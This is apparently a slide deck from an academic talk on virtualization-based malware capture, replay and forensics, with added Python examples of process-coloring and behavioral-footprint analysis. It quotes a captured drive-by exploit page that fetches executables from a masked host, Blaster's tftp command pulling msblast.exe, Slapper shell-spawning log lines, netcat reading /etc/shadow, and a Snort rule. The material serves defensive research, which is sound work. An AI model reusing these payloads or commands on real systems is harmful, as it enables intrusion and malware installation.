Enabling Internet Malware Investigation and Defense Using Virtualization
Dongyan Xu
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University
Collaborators
Florian Buchholz (James Madison U.), Xuxian Jiang (George Mason U.), Junghwan Rhee (Purdue U.), Ryan Riley (Purdue U.), Eugene H. Spafford (Purdue U.), AAron Walters (Fortify Research), Helen Wang (Microsoft Research), Yi-Min Wang (Microsoft Research)
Motivation: Rampant Malware Outbreaks
[Figure: malware outbreak chart with Blaster, Nimda and CodeRed marked. Source: Symantec Internet Security Threat Report]
Internet malware remains a top threat.
Malware: virus, worm, spyware, keylogger, bot, ...
Motivation: Stealthy Malware
Recruiting vulnerable nodes (e.g. to create a botnet)
- Zero-day exploits w/o software patches
- Low-and-slow propagation
- New attack strategies: exploiting vulnerable client-side software such as IE; propagating malware with RFID tags
Providing "value-added" service (or rather, harm)
- DDoS, spamming, identity theft, ...
- Sell/rent botnets for profit
Reality & Challenges
Lack of an investigation platform that enables
- early detection and capture of malware incidents
- replay and observation of malware behavior
At Internet scale this is hard to build:
- Increased spreading speed, sophistication, and malice
- Slammer worms infect 75,000 hosts in 10 minutes (Moore et al., 2003)
- Stealthy malware, zero-day exploits, mutations, ...
Our Integrated Malware Research Framework
[Figure: framework overview. Front-End: Collapsar Honeyfarm (Malware Trap; Collapsar: Security'04, NDSS'06, JPDC'06) captures external infections. Back-End: vGround Playground (Malware Playground; vGround: RAID'05) replays them. Defense components: Behavioral Footprinting (WORM'06), Contamination Tracking of internal contamination (Proc. Coloring: ICDCS'06), System Randomization. Roles: Detection, Investigation, Defense.]
Part I: Malware Capture
[Figure: framework overview with the Front-End (Collapsar: Security'04, NDSS'06, JPDC'06) highlighted; the other components are the Back-End vGround (RAID'05), Behavioral Footprinting (WORM'06), Contamination Tracking (Coloring: ICDCS'06) and System Randomization.]
Existing Approach: Honeypot
[Figure: honeypots deployed separately in Domain A, Domain B and Domain C, each connected directly to the Internet.]
Two weaknesses:
- Manageability vs. detection coverage
- Security risks: on-site attack occurrences
Our Approach: Collapsar
[Figure: redirectors in Domain A, Domain B and Domain C forward attack traffic through a front-end to VM-based honeypots in the Collapsar Center (Collapsar Honeyfarm), which also hosts a management station and a correlation engine.]
Benefit 1: Centralized management of honeypots w/ distributed (virtual) presence
Benefit 2: Off-site attack occurrences
Benefit 3: New possibilities for real-time attack correlation and log mining
Collapsar as a Server-side Honeyfarm
Passive honeypots w/ vulnerable server-side software
- Web servers (e.g., Apache, IIS, ...)
- Database servers (e.g., Oracle, MySQL, ...)
Blaster (2003), Sasser (2004), Zotob (2005)
Collapsar as a Client-side Honeyfarm
[Figure: client-side honeyfarm: VM-based honeypots in the Collapsar Center, with redirectors in Domain A, Domain B and Domain C forwarding traffic from a malicious web server to the front-end.]
Active honeypots w/ vulnerable client-side software
- Web browsers (e.g., IE, Firefox, ...)
- Email clients (e.g., Outlook, ...)
[HoneyMonkey, NDSS'06]
PlanetLab (310 sites)
288 malicious sites / 2 zero-day exploits
Upon clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
Result: 22 unwanted programs are installed without the user's consent!
A Real Incident: Exploitation of Client-side Vulnerability
Vulnerabilities targeted by the captured page: MS04-013, MS03-011, MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
Related Work
Systems compared: Honeyd [Security'04], iSink [RAID'04], IMS [NDSS'05]; honeyclient [RECON'05]; Domino [NDSS'04], NetBait ['03]; Potemkin [SOSP'05], GQ ['06]; Collapsar [Security'04, JPDC'06]
Comparison dimensions: high-interaction w/ real services; off-site attack occurrences; aggregation of scattered unused address space; passive & active honeypots
Honeypot type per group: Passive / Passive / Passive / Active / Passive & Active (Collapsar supports both)
Part II: Malware Playground
[Figure: framework overview with the Back-End (vGround: RAID'05) highlighted; the other components are the Front-End Collapsar (Security'04, NDSS'06, JPDC'06), Behavioral Footprinting, Contamination Tracking (Coloring: ICDCS'06) and System Randomization.]
Challenges
- Fidelity: real worms
- Confinement: destructive worms
- Scalability: epidemic propagation pattern
- Experimental efficiency
A Virtualization-Based Worm Playground
[Figure: vGround deployed on host paris.cs.purdue.edu]
- High fidelity: VM (full-system virtualization)
- Strict confinement: VN (link-layer network virtualization)
- Easy deployment: locally deployable
- Efficient experiments: image generation time 60 seconds; boot-strap time 90 seconds; tear-down time 10 seconds
A Worm Playground: Virtualization
In "Fighting Computer Virus Attacks", Peter Szor, USENIX Security Symposium, 2004
Challenge in Achieving Scalability
Three main techniques:
- VM footprint minimization (Redhat 9.0: 1G -> 32M)
- Delta virtualization (a.k.a. copy-on-write)
- Worm-driven vGround runtime expansion
Result: 2000+ virtual nodes in 10 physical machines
Worm Expert’s Comments on vGround
vGround Impact & Applications
- Evaluation: correctness of documented worm/malware analysis; effectiveness of defense mechanisms
- Education potentials
Part III: Malware Defense
[Figure: framework overview with Contamination Tracking of internal contamination (Coloring: ICDCS'06) highlighted; the other components are the Front-End Collapsar (Security'04, NDSS'06, JPDC'06), the Back-End vGround (RAID'05), Behavioral Footprinting and System Randomization.]
Malware Forensics
For each malware incident, it is desirable to find out:
- Break-in point: how did the malware break into the system?
- Contaminations: what did the malware do after the break-in?
Current Approach
[Figure: dependency graph of the incident. httpd spawns /bin/sh; /bin/sh spawns netcat, which reads /etc/shadow and confidential info, and wget, which creates a root kit; /bin/sh modifies local files; an alert is raised.]
Question 1: How did the malware break into the system?
Question 2: What did the malware do after break-in?
“httpd” READS an incoming request
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Current Approach
1: Online log collection
2: Offline backward tracking [King+, SOSP'03], from the alert back to the break-in point:
"wget" CREATES local file(s) - "Root kit"
"/bin/sh" CREATES a new process "wget"
"httpd" CREATES a new process "/bin/sh" <- Break-in Point!
3: Offline forward tracking, from the break-in point to the contaminations:
"httpd" CREATES a new process "/bin/sh" <- Break-in Point!
"/bin/sh" CREATES a new process "netcat"
"netcat" READS "/etc/shadow" file
"/bin/sh" CREATES a new process "wget"
"wget" CREATES local file(s) - "Root kit"
"/bin/sh" MODIFIES local files
Weaknesses of Current Approach
- Backward tracking (break-in point) inputs: detection point and the entire log
- Forward tracking (contaminations) inputs: break-in point and the entire log
[Figure: timeline from "Intrusion Occurred" to "Intrusion Detected": a long detection period, so the whole log has to be searched for a suspicious log entry.]
Analyze the entire log!
High volume log data: 1.2 gigabytes per day under server workload
Main Idea: Information Flow-Preserving Logging
[Figure: Apache, Sendmail, DNS and MySQL, each shown in its own color.]
Our Approach - Process Coloring
[Figure: at boot, init/rc starts s30sendmail, s45named, s55sshd and s80httpd, each assigned its own color (1: Initial Coloring). The color then follows every process and file the service touches (2: Coloring Diffusion): httpd -> /bin/sh -> netcat (reads /etc/shadow, confidential info), wget (creates root kit), local files modified. Every log entry, including the alert, carries the color of the process that produced it.]
Benefit 1: Immediate identification of break-in point
Benefit 2: Color-based log partition for contamination analysis
Color Diffusion Model
OS-level Information Flow (Buchholz 2005); s = subject (process), o = object (file, socket, ...)
Operation | Diffusion                                            | syscalls
CREATE    | create <s1, o1>: color(o1) = color(s1)              | create, mkdir, link
          | create <s1, s2>: color(s2) = color(s1)              | fork, vfork, clone
READ      | read <s1, o1>: color(s1) = color(s1) ∪ color(o1)    | read, readv, recv
          | read <s1, s2>: color(s1) = color(s1) ∪ color(s2)    | ptrace
WRITE     | write <s1, o1>: color(o1) = color(s1) ∪ color(o1)   | write, writev, send
          | write <s1, s2>: color(s2) = color(s1) ∪ color(s2)   | ptrace, wait, signal
DESTROY   | destroy <s1, o1>: ---- (no diffusion)               | unlink, rmdir, close
          | destroy <s1, s2>: ---- (no diffusion)               | exit, kill
Process Coloring Log – Slapper Worm
...
BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
BLUE: 673["sendmail"]: 6_close(5) = 0
BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
...
RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11
RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40
RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090
…
RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21
RED: 2568["httpd"]: 63_dup2(5, 2) = 2
RED: 2568["httpd"]: 63_dup2(5, 1) = 1
RED: 2568["httpd"]: 63_dup2(5, 0) = 0
RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)
RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2
RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
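The diffusion rules above are small enough to run end to end. The following is an added example, not the authors' kernel implementation: it applies the CREATE / READ / WRITE / DESTROY rules from the Color Diffusion Model table to a constructed event trace (the service names, PIDs, file names and the sequence of operations are assumptions modelled on the httpd break-in of the forensics slides, not a captured log), records each event with the color its process carries, and then shows the two benefits claimed for process coloring: the color of the alerted process names the break-in service directly, and only the entries of that color need to be inspected for contamination. Subjects that end up carrying more than one color are reported as well, since color mixing is itself an anomaly.

```python
"""Color diffusion over an OS-level event trace (added example, not the
authors' implementation). Encodes the CREATE / READ / WRITE / DESTROY rules
of the Color Diffusion Model and shows the two benefits of process coloring:
the alerted process's color names the break-in service, and the log can be
partitioned by color so only a fraction of it is inspected.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One OS-level operation: subject s1 acts on a target (object o1 or subject s2)."""
    subject: str   # acting process, e.g. "httpd[2568]" (constructed name)
    op: str        # CREATE | READ | WRITE | DESTROY
    target: str    # file/socket object ("/etc/shadow") or another process ("sh[2568]")


class ColorTracker:
    def __init__(self, initial_colors):
        # 1: initial coloring -- each network service process gets its own color
        self.service_of = {color: svc for svc, color in initial_colors.items()}
        self.colors = {svc: {color} for svc, color in initial_colors.items()}
        self.log = []  # (Event, colors of the acting subject once the event is applied)

    def _c(self, name):
        return self.colors.setdefault(name, set())

    def apply(self, ev):
        # 2: coloring diffusion, rule by rule from the Color Diffusion Model table
        s1, t = self._c(ev.subject), self._c(ev.target)
        if ev.op == "CREATE":
            self.colors[ev.target] = set(s1)   # color(o1) = color(s1); color(s2) = color(s1)
        elif ev.op == "READ":
            s1 |= t                             # color(s1) = color(s1) U color(o1 or s2)
        elif ev.op == "WRITE":
            t |= s1                             # color(o1 or s2) = color(s1) U color(o1 or s2)
        elif ev.op != "DESTROY":                # destroy (unlink, exit, kill, ...) diffuses nothing
            raise ValueError(f"unknown operation {ev.op}")
        self.log.append((ev, frozenset(self.colors[ev.subject])))

    def run(self, events):
        for ev in events:
            self.apply(ev)
        return self

    def break_in_point(self, alerted):
        """Services whose color the alerted subject carries: the break-in point, read
        off the alert itself instead of by backward tracking over the whole log."""
        return sorted(self.service_of[c] for c in self._c(alerted) if c in self.service_of)

    def partition(self, color):
        """Log entries carrying `color` (the only ones contamination analysis must
        inspect) and the fraction of the whole log they represent."""
        entries = [ev for ev, cs in self.log if color in cs]
        return entries, len(entries) / len(self.log)

    def mixed_subjects(self):
        """Subjects carrying more than one color; color mixing is itself an anomaly."""
        return sorted(s for s, cs in self.colors.items() if len(cs) > 1)


# Constructed initial coloring and trace (not a captured log), loosely following
# the httpd break-in on the forensics slides: the web server spawns a shell, which
# reads /etc/shadow through netcat and fetches a root kit with wget.
INITIAL = {"httpd[2568]": "RED", "sendmail[673]": "BLUE", "named[701]": "GREEN"}

TRACE = [
    Event("sendmail[673]", "READ", "/proc/loadavg"),
    Event("httpd[2568]", "READ", "inet_sock(80)"),       # incoming request
    Event("httpd[2568]", "CREATE", "sh[2568]"),          # execve("/bin//sh")
    Event("named[701]", "READ", "/etc/named.conf"),
    Event("sh[2568]", "CREATE", "netcat[2590]"),
    Event("netcat[2590]", "READ", "/etc/shadow"),
    Event("sendmail[673]", "WRITE", "/var/spool/mail/alice"),
    Event("sh[2568]", "CREATE", "wget[2591]"),
    Event("wget[2591]", "CREATE", "/tmp/rootkit"),       # detection point: alert on this file
    Event("sh[2568]", "WRITE", "/var/www/index.html"),
    Event("sh[2568]", "DESTROY", "/tmp/.bugtraq.c"),
    Event("sendmail[673]", "READ", "/tmp/rootkit"),      # a BLUE process touches a RED file
]

if __name__ == "__main__":
    t = ColorTracker(INITIAL).run(TRACE)
    print("break-in point for wget[2591]:", t.break_in_point("wget[2591]"))
    red, frac = t.partition("RED")
    print(f"RED entries: {len(red)} of {len(t.log)} ({frac:.0%} of the log)")
    print("color-mixing subjects:", t.mixed_subjects())
```

Colors are recorded on each log entry after the event has been applied, which is this example's choice; a READ that mixes colors therefore shows up in the partition of both colors, so an analyst inspecting the RED partition also sees the moment sendmail touched the root kit.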
Evaluation
                            Lion                   Slapper                 SARS
Time period being analyzed  24 hours               24 hours                24 hours
# worm-related entries      66,504                 195,884                 19,494
Exploited service           BIND (CVE-2001-0010)   Apache (CAN-2002-0656)  Samba (CAN-2003-0085)
% of log inspected          48.7%                  65.9%                   12.1%
Benefit for backward tracking: immediate identification of break-in point
Benefit for forward tracking: reduced log volume for contamination analysis
Question: Can we trust a compromised system to collect log information?
Challenge in Log Collection
[Figure: two logging architectures. Left: system call interception inside the OS kernel, with logging in the same kernel that User Process 1 and User Process 2 run on. Right: the guest OS kernel (UML) runs as a virtual machine on the host OS kernel + VMM; system calls are intercepted on the system virtualization path (ptrace) and logged outside the guest.]
Interception on the system virtualization path
Virtual Machine Introspection [Garfinkel+, NDSS'03]
More tamper-resistant
On-going Work
Multi-dimensional worm profiling & identification
- Content fingerprinting: unique recurring content
- Behavioral footprinting: unique recurring behavior
Infection cycle: probing, exploitation, replication, payload
MSBlaster/Windows Worm
[Figure: Blaster host 192.168.0.1 infecting target 192.168.10.11 (RPC).]
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell "cmd.exe" and binds it to port 4444/TCP
5. Creates "TFTP Server" on port 69/UDP
6. Sends "TFTP" command to shell
7. Runs TFTP command; "teleports" msblast.exe file
8. Sends "START msblast.exe" command
9. Runs worm on target!
10. Closes connection
11. Shell closes
Command run in the shell: >tftp –I 192.168.0.1 GET msblast.exe
Content signature for the same attack:
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Worm Name   Infection Vector   Behavioral Footprint
MSBlaster   RPC-DCOM           S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2
Footprint labels (protocol, source, destination, flags; "*" = ephemeral port):
S1:  TCP, infecter/*, victim/135, SYN
SA1: TCP, victim/135, infecter/*, SYN ACK
A1:  TCP, infecter/*, victim/135, ACK
R1:  TCP, infecter/*, victim/135, RST
S2:  TCP, infecter/*, victim/4444, SYN
SA2: TCP, victim/4444, infecter/*, SYN ACK
A2:  TCP, infecter/*, victim/4444, ACK
U1:  UDP, victim/*, infecter/69
U1:  UDP, infecter/69, victim/*
R2:  TCP, infecter/*, victim/4444, RST
Phases marked on the footprint: Exploitation, Replication
Content signature for comparison:
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Worm Name   Infection Vector            Behavioral Footprint
MSBlaster   RPC-DCOM                    S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2
Welchia     RPC-DCOM                    (footprint string not legible in the extracted slide)
Sasser      LSASS                       (footprint string not legible in the extracted slide)
Ramen       LPRng, WU-FTPD, NFS-UTILS   (footprint string not legible in the extracted slide)
Lion        BIND                        (footprint string not legible in the extracted slide)
Slapper     APACHE                      (footprint string not legible in the extracted slide)
SARS        SAMBA                       (footprint string not legible in the extracted slide)
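To make the footprint notation concrete, here is an added example (not the authors' profiling code) that derives the MSBlaster footprint from a packet sequence. It assigns the infecter/victim roles (the source of the first packet is taken to be the infecter), numbers connections per protocol by their service port, replaces ephemeral ports by "*", and emits the S/SA/A/R/U labels used on the slides. The constructed trace follows the numbered infection steps above with the addresses and ports shown on the slides; the subsequence matching rule, under which a footprint still matches when retransmissions or unrelated packets are interleaved, is this example's own choice.

```python
"""Behavioral footprinting of a worm's network behavior (added example, not the
authors' code). A packet sequence is turned into the footprint notation of the
MSBlaster slides: each packet becomes a label -- S, SA, A, R for TCP SYN,
SYN-ACK, ACK, RST and U for UDP -- subscripted with the ordinal of the
connection it belongs to, and endpoints are normalized to infecter/victim
roles with ephemeral ports replaced by "*". A footprint is then matched as an
ordered subsequence, so retransmissions or unrelated packets in between do not
hide it (this subsequence rule is this example's choice, not the slides').
"""
from collections import namedtuple

# A packet event as seen on the wire: protocol, source, destination, TCP flags.
Pkt = namedtuple("Pkt", "proto src sport dst dport flags")

TCP_FLAG_NAMES = {"S": "SYN", "SA": "SYN ACK", "A": "ACK", "R": "RST"}


def footprint(packets):
    """Return (labels, normalized): e.g. ["S1", "SA1", ...] and
    [("TCP", "infecter/*", "victim/135", "SYN"), ...]."""
    if not packets:
        return [], []
    # The source of the first packet is taken to be the infecter.
    roles = {packets[0].src: "infecter", packets[0].dst: "victim"}
    conn_index = {}                  # (proto, service port) -> ordinal per protocol
    counters = {"TCP": 0, "UDP": 0}
    labels, normalized = [], []
    for p in packets:
        known_dst = (p.proto, p.dport) in conn_index
        known_src = (p.proto, p.sport) in conn_index
        if not known_dst and not known_src:
            # A TCP SYN or the first UDP datagram opens a connection; its destination
            # port is the service port and the other side's port is ephemeral.
            if p.proto == "UDP" or p.flags == "S":
                counters[p.proto] += 1
                conn_index[(p.proto, p.dport)] = counters[p.proto]
                known_dst = True
            else:
                continue  # stray packet of a connection we never saw open
        svc_port = p.dport if known_dst else p.sport
        idx = conn_index[(p.proto, svc_port)]
        letter = "U" if p.proto == "UDP" else p.flags
        labels.append(f"{letter}{idx}")
        src = f"{roles.get(p.src, p.src)}/{p.sport if p.sport == svc_port else '*'}"
        dst = f"{roles.get(p.dst, p.dst)}/{p.dport if p.dport == svc_port else '*'}"
        normalized.append((p.proto, src, dst, TCP_FLAG_NAMES.get(p.flags, "")))
    return labels, normalized


def matches(labels, signature):
    """True if `signature` occurs in `labels` as an ordered subsequence."""
    it = iter(labels)
    return all(s in it for s in signature)


# Constructed trace of one MSBlaster infection, following the numbered steps on
# the slide: exploit over 135/TCP, RST, shell on 4444/TCP, msblast.exe fetched
# over 69/UDP, RST. Addresses and ports are the ones shown on the slides.
INFECTER, VICTIM = "192.168.0.1", "192.168.10.11"
MSBLASTER_TRACE = [
    Pkt("TCP", INFECTER, 4581, VICTIM, 135, "S"),
    Pkt("TCP", VICTIM, 135, INFECTER, 4581, "SA"),
    Pkt("TCP", INFECTER, 4581, VICTIM, 135, "A"),
    Pkt("TCP", INFECTER, 4581, VICTIM, 135, "R"),
    Pkt("TCP", INFECTER, 4599, VICTIM, 4444, "S"),
    Pkt("TCP", VICTIM, 4444, INFECTER, 4599, "SA"),
    Pkt("TCP", INFECTER, 4599, VICTIM, 4444, "A"),
    Pkt("UDP", VICTIM, 1552, INFECTER, 69, ""),   # tftp request for msblast.exe
    Pkt("UDP", INFECTER, 69, VICTIM, 1552, ""),   # tftp data
    Pkt("TCP", INFECTER, 4599, VICTIM, 4444, "R"),
]
MSBLASTER_FOOTPRINT = footprint(MSBLASTER_TRACE)[0]   # S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2

# A benign-looking trace: a plain connection to 135/TCP that is reset. It shares
# the first four labels with MSBlaster but never reaches the shell or tftp phase.
BENIGN_TRACE = MSBLASTER_TRACE[:4]

if __name__ == "__main__":
    for label, norm in zip(*footprint(MSBLASTER_TRACE)):
        print(f"{label:>4}: {norm}")
    print("MSBlaster footprint:", " ".join(MSBLASTER_FOOTPRINT))
    print("benign trace matches:", matches(footprint(BENIGN_TRACE)[0], MSBLASTER_FOOTPRINT))
```

Because the footprint carries no payload bytes, it is unaffected by the kind of content variation that defeats the byte-pattern rule shown above; the price is that a benign client which happens to reproduce the whole connection sequence would match too, which is why the footprint is one dimension of the profile next to content fingerprinting rather than a replacement for it.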
Summary
[Figure: the integrated platform: redirectors in Domain A, Domain B and Domain C feed a Collapsar front-end, which in turn feeds vGround I and vGround II.]
Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research platform
Backup Slides
Another Example Incident: Windows XP Server-side Honeypot/VMware Vulnerability
RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
Time-line:
- Deployed: 22:10:00pm, 11/26/03
- MSBlast: 00:36:47am, 11/27/03
- Enbiei: 01:48:57am, 11/27/03
- Nachi: 07:03:55am, 11/27/03
http://www.cs.purdue.edu/homes/jiangx/collapsar
vGround: Network Virtualization
[Figure: Virtual Machine 1 and Virtual Machine 2 (each with its own guest OS) on a Host OS / VMM, connected through Virtual Switch 1; IP-IP tunnels link the hosts.]
Option 1: Network-layer virtualization (e.g., X-Bone)
Option 2: Link-layer virtualization (e.g., VIOLIN)
Logging Integrity -- Existing Approach
[Figure: a user-space fork("/bin/sh") enters kernel space through the System Call Dispatcher and the System Call Table (0 restart -> sys_restart_syscall, 1 exit -> sys_exit, 2 fork -> sys_fork, 3 read -> sys_read, 4 write -> sys_write, 283 ni_syscall -> sys_ni_syscall); logging hooks log_restart_syscall, log_exit, log_fork, log_read, log_write and log_ni_syscall wrap each entry and record its result.]
System call interception: Unreliable!
Virtual Machine Introspection [Garfinkel+, NDSS'03]
Interception at the system virtualization path
[Figure: Type 1 VMM: the Virtual Machine Monitor (VMM) runs on the hardware with Guest OS 1 and Guest OS 2 above it. Type 2 VMM: a Host OS runs on the hardware, the VMM on the host OS, and the guests above. In both, logging is done in the VMM, outside Guest OS 2.]
Tamper-Resistant!
Process Coloring -- Slapper Worm
[Figure: inet_sock(80) --accept--> 2568: httpd --dup2, read (fd 5); recv--> 2568 (execve): /bin//sh --execve--> 2568 (execve): /bin/bash -i --fork, execve--> 2586: /bin/rm -rf /tmp/.bugtraq.c and 2587: /bin/cat /tmp/.uubugtraq /tmp/.bugtraq.c (open, dup2, write; unlink). Every node carries httpd's color.]
Counter-attacks against Proc. Coloring
- Coloring mixing attack. Good news: an important anomaly itself. Bad news: need for advanced filtering policies.
- Low-level attack: kernel integrity (e.g. CoPilot, Livewire, Pioneer); shadow structure via VMM
- Diffusion-cutting attack: covert channels
Footprinting Representation
MSBlaster Worm: 1st TCP handshake (135/TCP); RST; 2nd TCP handshake (4444/TCP, shell); sending "tftp …"; 69/UDP (tftp); RST
Footprint: S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2
With the observed ports:
S1:  TCP, infecter/4581, victim/135, SYN
SA1: TCP, victim/135, infecter/4581, SYN ACK
A1:  TCP, infecter/4581, victim/135, ACK
R1:  TCP, infecter/4581, victim/135, RST
S2:  TCP, infecter/4599, victim/4444, SYN
SA2: TCP, victim/4444, infecter/4599, SYN ACK
A2:  TCP, infecter/4599, victim/4444, ACK
U1:  UDP, victim/1552, infecter/69
U1:  UDP, infecter/69, victim/1552
R2:  TCP, infecter/4599, victim/4444, RST
Generalized (ephemeral ports replaced by *):
S1:  TCP, infecter/*, victim/135, SYN
SA1: TCP, victim/135, infecter/*, SYN ACK
A1:  TCP, infecter/*, victim/135, ACK
R1:  TCP, infecter/*, victim/135, RST
S2:  TCP, infecter/*, victim/4444, SYN
SA2: TCP, victim/4444, infecter/*, SYN ACK
A2:  TCP, infecter/*, victim/4444, ACK
U1:  UDP, victim/*, infecter/69
U1:  UDP, infecter/69, victim/*
R2:  TCP, infecter/*, victim/4444, RST
Content signature for comparison:
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)